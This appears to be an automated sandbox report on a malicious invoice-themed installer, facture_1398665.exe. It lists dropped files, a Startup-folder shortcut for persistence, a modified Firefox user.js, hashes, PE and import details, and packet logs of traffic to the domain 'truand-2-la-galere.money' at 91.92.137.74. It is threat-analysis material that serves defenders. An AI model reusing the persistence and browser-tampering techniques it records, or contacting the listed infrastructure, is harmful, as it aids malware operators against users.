SHA-512:DE0D89C1AC2C5C99B8607E49D2F6AE7D6BE79748BE71DE5A74B6A193A92E4CB0C600230A3893AA9C595CB3632051876507F527EB4155FFFFA1A5E253EDC21755
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\mozglue.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
Size (bytes):133072
Entropy (8bit):6.814709386830881
Encrypted:false
MD5:E2F7B050C6C83505611807E81DB58E16
SHA1:A06A6FD60486E8B27E926F30B7D20FC7B2354EED
SHA-256:9019976DF7D3423DCCEFF61397360BB300F693A1BF98E5BFD33AD3FBEADD24D8
SHA-512:EFB432A1389136A9F87B8834B9C78C1BAF953B84D338621E4841376D03B0A31D1F92186786C3CD8FB390A25A2ED77A2C0F1E3C49F73C57994EF684E552969407
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\msvcp140.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):440120
Entropy (8bit):6.655941426443587
Encrypted:false
MD5:D25C3FF7A4CBBFFC7C9FFF4F659051CE
SHA1:02FE8D84D7F74C2721FF47D72A6916028C8F2E8A
SHA-256:9C1DC36D319382E1501CDEAAE36BAD5B820EA84393EF6149E377D2FB2FC361A5
SHA-512:945FE55B43326C95F1EEE643D46A53B69A463A88BD149F90E9E193D71B84F4875455D37FD4F06C1307BB2CDBE99C1F6E18CB33C0B8679CD11FEA820D7E728065
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\msvcr110.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
Size (bytes):875472
Entropy (8bit):6.9224404430053434
Encrypted:false
MD5:4BA25D2CBE1587A841DCFB8C8C4A6EA6
SHA1:52693D4B5E0B55A929099B680348C3932F2C3C62
SHA-256:B30160E759115E24425B9BCDF606EF6EBCE4657487525EDE7F1AC40B90FF7E49
SHA-512:82E86EC67A5C6CDDF2230872F66560F4B0C3E4C1BB672507BBB8446A8D6F62512CBD0475FE23B619DB3A67BB870F4F742761CF1F87D50DB7F14076F54006F6C6
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\ucrtbase.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):917184
Entropy (8bit):6.825553978446455
Encrypted:false
MD5:D2C5233317767EE9329F470C39B046B1
SHA1:42493597D3DED76DAA9A3C5CAD5D4343958D0D55
SHA-256:F085B1B009AB89049BA95DD4FFDE276D5B1F6FA0055F58DC3FC0D4B03AE8116D
SHA-512:930B31042B5DDC507D4810C10677DB9786B8A16AD8A3ED09BA0A6256DDDC9C2706D1957ABBE3071D09C8CDCC2F142914AE7F7B727DC3E9F8DD7D821D118B715A
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\vcruntime140.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):83784
Entropy (8bit):6.845861669519175
Encrypted:false
MD5:A2523EA6950E248CBDF18C9EA1A844F6
SHA1:549C8C2A96605F90D79A872BE73EFB5D40965444
SHA-256:6823B98C3E922490A2F97F54862D32193900077E49F0360522B19E06E6DA24B4
SHA-512:2141C041B6BDBEE9EC10088B9D47DF02BF72143EB3619E8652296D617EFD77697F4DC8727D11998695768843B4E94A47B1AED2C6FB9F097FFC8A42CA7AAAF66A
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\F48A04623C4E0000.lnk
Process:C:\Windows\System32\dllhost.exe
File Type:MS Windows shortcut
Size (bytes):45708
Entropy (8bit):4.844147996064094
Encrypted:false
MD5:1BFBBC1E738037DE253A92FBC49958B1
SHA1:6783B0E8925F4E90999D008EA91199B9A7C79F8C
SHA-256:2B2F1BC291F409405FCB4295B5B8ACC272DBAA70E937A0E37C520736E8433789
SHA-512:3F5155619C8DCF7CB34065802BFD3E3DD773D2EDF04C781AFA1FE817877823EE1E45072F443BEB43148B43A9BA4D80CDEDC0F9285F7A0DAE9E40F491F6393A4E
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\user.js
Process:C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
File Type:ASCII text, with CRLF line terminators
Size (bytes):368
Entropy (8bit):4.853586373412553
Encrypted:false
MD5:57C038EDE79531E703D70493E88B584D
SHA1:0DA5ED227B04E5C06B87A3081E0BF39D78903E7B
SHA-256:A8BBDEC0446B8CA598C2717A0EC7EABBC42ED2CDC6E2FA5E902645B0904263BA
SHA-512:ADBA59C02A7BC21AEAD4A557F18A054E53F5329CF01B72B7C626BE0536BB58A0AC2D5E70BA0CCF47FD7A1DCC739C8EFD509B6FCD7C9A6CDD7AC1ADB2497AC5BF
Malicious:false
Reputation:low

Contacted Domains/Contacted IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
truand-2-la-galere.money91.92.137.74truefalseunknown

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public

IPCountryFlagASNASN NameMalicious
91.92.137.74Bulgaria
203543RT-ELECTRONICS-2015GazInvestProektltdBGfalse

Private

IP

Static File Info

General

File type:PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Entropy (8bit):7.964395891908483
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.92%
  • Win16/32 Executable Delphi generic (2074/23) 0.02%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Java Script embedded in Visual Basic Script (1500/0) 0.01%
File name:facture_1398665.exe
File size:2153784
MD5:fe1214a06ffc40b1ebb524f185894487
SHA1:237b14d2aab873fed20574bd708d6840ce87a76b
SHA256:cc3674f980fda4895865507f4ebe460b7553ace60b70e2d0dea0807c68003f7b
SHA512:29bb6fab2a6c1680dbf5440d7e4b3a96ac474b57ce4e055bffd96f928b00655c79fd1faaebd2a24fca19790183f998ccdde09a3f33b01f686cc7704ac7c664cf
File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon

Static PE Info

General

Entrypoint:0x4117dc
Entrypoint Section:.itext
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED
DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:0x57051F88 [Wed Apr 06 14:39:04 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:0
File Version Major:5
File Version Minor:0
Subsystem Version Major:5
Subsystem Version Minor:0
Import Hash:20dd26497880c05caed9305b3c8b9109

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFA4h
push ebx
push esi
push edi
xor eax, eax
mov dword ptr [ebp-3Ch], eax
mov dword ptr [ebp-40h], eax
mov dword ptr [ebp-5Ch], eax
mov dword ptr [ebp-30h], eax
mov dword ptr [ebp-38h], eax
mov dword ptr [ebp-34h], eax
mov dword ptr [ebp-2Ch], eax
mov dword ptr [ebp-28h], eax
mov dword ptr [ebp-14h], eax
mov eax, 00410144h
call 0FB7B77Dh
xor eax, eax
push ebp
push 00411EBEh
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
xor edx, edx
push ebp
push 00411E7Ah
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
mov eax, dword ptr [00415B48h]
call 0FB83EC3h
call 0FB83A12h
cmp byte ptr [00412ADCh], 00000000h
je 0FB869BEh
call 0FB83FD8h
xor eax, eax
call 0FB79815h
lea edx, dword ptr [ebp-14h]
xor eax, eax
call 0FB80A5Bh
mov edx, dword ptr [ebp-14h]
mov eax, 00418658h
call 0FB79DEAh
push 00000002h
push 00000000h
push 00000001h
mov ecx, dword ptr [00418658h]
mov dl, 01h
mov eax, dword ptr [0040C04Ch]
call 0FB81372h
mov dword ptr [0041865Ch], eax
xor edx, edx
push ebp
push 00411E26h
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
call 0FB83F36h
mov dword ptr [00418664h], eax
mov eax, dword ptr [00418664h]

Data Directories

NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IMPORT0x190000xe04.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE0x1c0000x1708c.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x1b0000x18.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x193040x214.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

Sections

NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
.text0x10000xf2440xf400False0.548171746926ump; data6.37521350405IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.itext0x110000xf640x1000False0.55859375ump; DBase 3 data file with memo(s) (251723841 records)5.73220066616IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data0x120000xc880xe00False0.253348214286ump; data2.29672090879IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.bss0x130000x56bc0x0False0ump; empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.idata0x190000xe040x1000False0.321533203125ump; SysEx File -4.59781255771IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.tls0x1a0000x80x0False0ump; empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rdata0x1b0000x180x200False0.05078125ump; data0.20448815744IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc0x1c0000x1708c0x17200False0.500242820946ump; data6.25860342437IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

NameRVASizeTypeLanguageCountry
RT_ICON0x1c4dc0x2e3dump; PNG image, 256 x 256, 8-bit colormap, non-interlacedEnglishUnited States
RT_ICON0x1f31c0xea8ump; dataEnglishUnited States
RT_ICON0x201c40x8a8ump; dataEnglishUnited States
RT_ICON0x20a6c0x568ump; GLS_BINARY_LSB_FIRSTEnglishUnited States
RT_ICON0x20fd40x4b87ump; PNG image, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
RT_ICON0x25b5c0x25a8ump; dataEnglishUnited States
RT_ICON0x281040x10a8ump; dataEnglishUnited States
RT_ICON0x291ac0x468ump; GLS_BINARY_LSB_FIRSTEnglishUnited States
RT_STRING0x296140x68ump; DBase 3 index file
RT_STRING0x2967c0xd4ump; data
RT_STRING0x297500xa4ump; DBase 3 data file (7929953 records)
RT_STRING0x297f40x2acump; data
RT_STRING0x29aa00x34cump; data
RT_STRING0x29dec0x294ump; data
RT_RCDATA0x2a0800x82e8ump; dataEnglishUnited States
RT_RCDATA0x323680x10ump; Sendmail frozen configuration
RT_RCDATA0x323780x150ump; data
RT_RCDATA0x324c80x2cump; data
RT_GROUP_ICON0x324f40x76ump; MS Windows icon resource - 8 icons, 256-colorsEnglishUnited States
RT_VERSION0x3256c0x4f4ump; dataEnglishUnited States
RT_MANIFEST0x32a600x62cump; XML document textEnglishUnited States

Imports

DLLImport
oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dllRegQueryValueExW, RegOpenKeyExW, RegCloseKey
user32.dllGetKeyboardType, LoadStringW, MessageBoxA, CharNextW
kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetSystemInfo, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenW, lstrcpynW, LoadLibraryExW, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetCommandLineW, FreeLibrary, FindFirstFileW, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle, CloseHandle
kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleW
user32.dllCreateWindowExW, TranslateMessage, SetWindowLongW, PeekMessageW, MsgWaitForMultipleObjects, MessageBoxW, LoadStringW, GetSystemMetrics, ExitWindowsEx, DispatchMessageW, DestroyWindow, CharUpperBuffW, CallWindowProcW
kernel32.dllWriteFile, WideCharToMultiByte, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, SizeofResource, SignalObjectAndWait, SetLastError, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, RemoveDirectoryW, ReadFile, MultiByteToWideChar, LockResource, LoadResource, LoadLibraryW, GetWindowsDirectoryW, GetVersionExW, GetVersion, GetUserDefaultLangID, GetThreadLocale, GetSystemInfo, GetSystemDirectoryW, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeProcess, GetEnvironmentVariableW, GetDiskFreeSpaceW, GetCurrentProcess, GetCommandLineW, GetCPInfo, InterlockedExchange, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FindResourceW, EnumCalendarInfoW, DeleteFileW, CreateProcessW, CreateFileW, CreateEventW, CreateDirectoryW, CloseHandle
advapi32.dllRegQueryValueExW, RegOpenKeyExW, RegCloseKey, OpenProcessToken, LookupPrivilegeValueW
comctl32.dllInitCommonControls
kernel32.dllSleep
advapi32.dllAdjustTokenPrivileges

Version Infos

DescriptionData
LegalCopyright
FileVersion
CompanyNametest.
CommentsThis installation was built with Inno Setup.
ProductNametest
ProductVersiontest
FileDescriptiontest Setup
Translation0x0000 0x04b0

Possible Origin

Language of compilation systemCountry where language is spokenMap
EnglishUnited States

Network Behavior

Network Port Distribution

TCP Packets

TimestampSource PortDest PortSource IPDest IP
Mai 7, 2018 14:49:36.631899118 MESZ6370053192.168.1.818.8.8.8
Mai 7, 2018 14:49:36.814659119 MESZ53637008.8.8.8192.168.1.81
Mai 7, 2018 14:49:36.882920027 MESZ49162443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:36.882975101 MESZ4434916291.92.137.74192.168.1.81
Mai 7, 2018 14:49:36.883605003 MESZ49162443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:37.122706890 MESZ49162443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:37.122750998 MESZ4434916291.92.137.74192.168.1.81
Mai 7, 2018 14:49:49.415394068 MESZ4434916291.92.137.74192.168.1.81
Mai 7, 2018 14:49:49.415448904 MESZ4434916291.92.137.74192.168.1.81
Mai 7, 2018 14:49:49.415469885 MESZ4434916291.92.137.74192.168.1.81
Mai 7, 2018 14:49:49.415647984 MESZ49162443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:49.480731964 MESZ49162443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:49.480768919 MESZ4434916291.92.137.74192.168.1.81
Mai 7, 2018 14:49:49.482016087 MESZ4434916291.92.137.74192.168.1.81
Mai 7, 2018 14:49:49.483091116 MESZ49162443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:50.436608076 MESZ49162443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:50.475008965 MESZ4434916291.92.137.74192.168.1.81
Mai 7, 2018 14:49:50.485364914 MESZ5424453192.168.1.818.8.8.8
Mai 7, 2018 14:49:50.615817070 MESZ53542448.8.8.8192.168.1.81
Mai 7, 2018 14:49:50.626178980 MESZ6041353192.168.1.818.8.8.8
Mai 7, 2018 14:49:50.746747017 MESZ53604138.8.8.8192.168.1.81
Mai 7, 2018 14:49:50.974263906 MESZ4434916291.92.137.74192.168.1.81
Mai 7, 2018 14:49:50.975575924 MESZ49162443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:50.975601912 MESZ4434916291.92.137.74192.168.1.81
Mai 7, 2018 14:49:50.979106903 MESZ49162443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:50.991595984 MESZ49162443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:50.997324944 MESZ4434916291.92.137.74192.168.1.81
Mai 7, 2018 14:49:50.997864008 MESZ49162443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:51.014880896 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:51.014935017 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:51.016784906 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:51.018317938 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:51.018341064 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:52.041563988 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:52.041852951 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:52.057332993 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:52.057374954 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:52.101337910 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:52.101366997 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:52.988152027 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:52.988320112 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:52.988338947 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:52.988358021 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:52.988365889 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:52.988372087 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:52.988382101 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:52.988393068 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:52.988401890 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:52.988409996 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:52.988862991 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:52.988890886 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:52.988905907 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:52.988917112 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:52.989166975 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:52.989253044 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.120769024 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.120812893 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.120842934 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.120866060 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.120887041 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.120913982 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.120944977 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.120955944 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.120966911 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.120978117 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.120987892 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.121303082 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.121334076 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.121624947 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.121705055 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.226696968 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.226727962 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.226736069 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.226742983 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.226751089 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.226758957 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.226780891 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.226788998 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.226797104 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.226804972 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.226811886 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.227107048 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.227152109 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.227494955 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.227615118 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.316730022 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.316766977 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.316776037 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.316783905 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.316792011 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.316800117 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.316824913 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.316833973 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.316847086 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.316854954 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.316863060 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.319443941 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.319494963 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.319746017 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.323230028 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.403023005 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.403064966 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.403073072 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.403091908 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.403101921 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.403112888 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.403136969 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.403151035 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.403162003 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.403172016 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.403181076 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.403311014 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.403352022 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.403568029 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.404103041 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.474935055 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.474960089 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.474966049 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.474972010 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.474993944 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.475011110 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.475028992 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.475034952 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.475040913 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.475045919 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.475052118 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.475305080 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.475361109 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.475653887 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.475769997 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.531871080 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.531908035 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.531923056 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.531939030 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.531956911 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.531970978 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.532010078 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.532025099 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.532058001 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.532072067 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.532084942 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.532190084 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.532238960 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.532808065 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.590961933 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.591044903 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.591061115 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.591082096 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.591099977 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.591114998 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.591155052 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.591171980 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.591187000 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.591200113 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.591213942 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.591227055 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.591259956 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.591809988 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.644042969 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.644067049 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.644083977 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.644098043 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.644113064 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.644128084 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.644154072 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.644162893 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.644171953 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.644180059 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.644187927 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.644385099 MESZ49164443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:53.644449949 MESZ4434916491.92.137.74192.168.1.81
Mai 7, 2018 14:49:53.644751072 MESZ49164443192.168.1.8191.92.137.74
